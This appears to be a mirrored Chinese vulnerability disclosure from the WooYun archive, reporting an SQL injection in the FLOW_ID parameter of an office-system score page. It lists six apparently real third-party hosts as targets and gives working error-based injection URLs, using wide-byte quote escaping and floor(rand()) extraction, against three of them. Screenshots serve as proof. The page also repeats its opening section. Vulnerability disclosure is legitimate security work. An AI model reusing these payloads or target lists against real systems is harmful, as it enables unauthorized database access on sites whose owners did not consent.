VULHUB ™

### 简要描述： RT ### 详细说明： 前人案例： ``` http://wooyun.org/bugs/wooyun-2010-082959 ``` 注入链接： ``` /general/score/flow/scoredate/result.php?FLOW_ID= ``` 案例： ``` http://122.144.134.79/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.ccas.com.cn:8008/general/score/flow/scoredate/result.php?FLOW_ID=11 http://219.139.134.9:70/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.esyf.net:8000/general/score/flow/scoredate/result.php?FLOW_ID=11 http://61.153.216.116:85/general/score/flow/scoredate/result.php?FLOW_ID=11 http://idula.com/general/score/flow/scoredate/result.php?FLOW_ID=11 ``` ### 漏洞证明： SQL1： ``` http://122.144.134.79//general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 ``` [<img...

### 简要描述： RT ### 详细说明： 前人案例： ``` http://wooyun.org/bugs/wooyun-2010-082959 ``` 注入链接： ``` /general/score/flow/scoredate/result.php?FLOW_ID= ``` 案例： ``` http://122.144.134.79/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.ccas.com.cn:8008/general/score/flow/scoredate/result.php?FLOW_ID=11 http://219.139.134.9:70/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.esyf.net:8000/general/score/flow/scoredate/result.php?FLOW_ID=11 http://61.153.216.116:85/general/score/flow/scoredate/result.php?FLOW_ID=11 http://idula.com/general/score/flow/scoredate/result.php?FLOW_ID=11 ``` ### 漏洞证明： SQL1： ``` http://122.144.134.79//general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 ``` [<img src="https://images.seebug.org/upload/201505/2620264227a5a1eaba1fee7f62e5d9fbec916822.jpg" alt="01.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/2620264227a5a1eaba1fee7f62e5d9fbec916822.jpg) ``` ``` SQL2 ``` http://www.ccas.com.cn:8008/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 ``` [<img src="https://images.seebug.org/upload/201505/26202728280242a678e7c20744f4c0b8e040bf99.jpg" alt="02.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/26202728280242a678e7c20744f4c0b8e040bf99.jpg) ``` ``` SQL3 ``` http://219.139.134.9:70/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 ``` [<img src="https://images.seebug.org/upload/201505/2620283866ef93d21c2a64c3a72533d97d4bda43.jpg" alt="03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/2620283866ef93d21c2a64c3a72533d97d4bda43.jpg) ``` ```